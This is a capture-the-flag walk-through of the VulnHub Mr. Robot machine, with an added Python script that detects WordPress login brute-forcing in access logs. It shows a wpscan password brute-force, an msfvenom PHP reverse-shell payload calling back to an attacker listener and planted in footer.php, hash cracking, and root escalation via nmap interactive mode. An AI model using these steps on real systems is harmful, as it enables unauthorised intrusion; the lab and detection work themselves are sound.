This is my walk-through of the Mr. Robot CTF challenge posted on vulnhub.com. All testing on this image was performed in an isolated lab environment. Understand that using the tools demonstrated in this walk-through against a host without permission is against the law. Be smart folks, and enjoy the walk-through.
Full NMAP scan of host:
root@kali:~# nmap -p- -A 192.168.1.224
The NMAP scan shows port 80 & 443 open. A quick check with a browser: Lots to read, and videos too:
A Nikto scan against port 80 tells us that the site is running WordPress, and there is a robots.txt file:
root@kali:~# nikto -h http://192.168.1.224
Using Curl to view robots.txt:
root@kali:~# curl -i -L http://192.168.1.224/robots.txt
The robots.txt file contains 2 entries. Our first key, and a dictionary file.
Using Curl to view our first key:
root@kali:~# curl -i -L http://192.168.1.224/key-1-of-3.txt
Downloading the dictionary file using Wget:
root@kali:~/Downloads# wget http://192.168.1.224/fsocity.dic
So we have our first key, where to now? I know that the site is running WordPress and I have a dictionary file that I will assume contains the password for a WordPress user. I ran WPscan and didn’t find anything of use. I tried to enumerate users using both WPscan and Metasploit but no luck. I tried to brute force the admin user with the dictionary file I downloaded, but that did not work either. So now what?
I went back and revisited the website, watched all the videos and viewed the source of all of the pages and I found something of interest. Go back to the main site and type prepare and watch the video:
The video makes reference to a website, whoismrrobot.com. I visited the site and something stood out on the main page: the name Elliot is listed as a command. Elliot is the main character in the series. I think we have found our WordPress user:
I used WPscan to brute force the password for elliot using the dictionary I previously downloaded. This took several hours, but it worked. Elliot’s password is ER28-0652:
root@kali:~# wpscan -u http://192.168.1.224 --wordlist /root/Downloads/fsocity.dic --username elliot -t 10
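A wordlist attack like the one above hammers wp-login.php (and, depending on the tool, xmlrpc.php) for hours, which makes it easy to spot in the web server's access log. The following is an added detection example, not part of the original walk-through: it parses constructed Apache combined-log lines, counts login POSTs per source IP in a sliding time window, and flags a 302 after the burst as a successful guess. The log lines, IPs and threshold are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log lines (not from the original walk-through).
# WordPress answers a failed wp-login.php POST with 200 (form re-rendered) and
# a successful one with a 302 redirect, so a 302 after a run of 200s is the tell.
SAMPLE_LOG = """\
192.168.1.233 - - [20/Nov/2016:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan"
192.168.1.233 - - [20/Nov/2016:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan"
192.168.1.233 - - [20/Nov/2016:10:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan"
192.168.1.233 - - [20/Nov/2016:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan"
192.168.1.233 - - [20/Nov/2016:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan"
10.0.0.5 - - [20/Nov/2016:10:00:05 +0000] "GET /robots.txt HTTP/1.1" 200 62 "-" "curl/7.50"
10.0.0.7 - - [20/Nov/2016:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

def detect_wp_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Map each source IP that POSTs to a WordPress login endpoint at least
    `threshold` times within any `window` to its attempt count and whether a
    302 (successful login) followed."""
    events = defaultdict(list)  # ip -> [(timestamp, status)]
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] not in LOGIN_PATHS:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events[m["ip"]].append((ts, int(m["status"])))
    alerts = {}
    for ip, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):  # sliding window over sorted POSTs
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                success = any(st == 302 for _, st in hits[start:])
                alerts[ip] = {"attempts": len(hits), "success": success}
                break
    return alerts

if __name__ == "__main__":
    for ip, info in detect_wp_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} login POSTs, guess succeeded: {info['success']}")
```

On the sample data the single legitimate login from 10.0.0.7 stays below the threshold, while the scanner's burst is reported with a successful guess; rate limiting or lockout on these two endpoints is the corresponding mitigation.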
Logged into WordPress using Elliot’s credentials:
Elliot has admin privileges in WordPress. An easy way to get a shell is to create PHP reverse shellcode using Msfvenom and add it to one of the WordPress PHP files. In my case I will add my PHP code to footer.php.
Creating reverse shellcode using Msfvenom:
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.233 LPORT=443 -f raw
Pasting my PHP code into the footer.php file. You can navigate here by clicking on appearance–>editor–>footer.php:
Now that I have the shellcode in place, I fire up my Metasploit handler to receive the shell. You can see my options below:
I execute the shellcode using Curl:
Received the shell with Metasploit:
So now I have a low privilege shell. Poking around a bit, I find key 2 but I don’t have privileges to view it. I also find a file that contains the username robot and an MD5 password hash:
I use the hashkiller website to crack the hash. The password for robot is abcdefghijklmnopqrstuvwxyz:
I su to robot, and I am able to view key 2:
Poking around a bit more, I find a root folder. I am assuming key 3 is there, so we need to escalate privileges on this host. I download the linuxprivchecker.py file to the host and run it. Immediately, I find something interesting:
I run NMAP in interactive mode and drop to a !sh with root privileges. I find key 3 in the root folder as expected:
robot@linux:/tmp$ nmap --interactive
Hope you found this helpful 🙂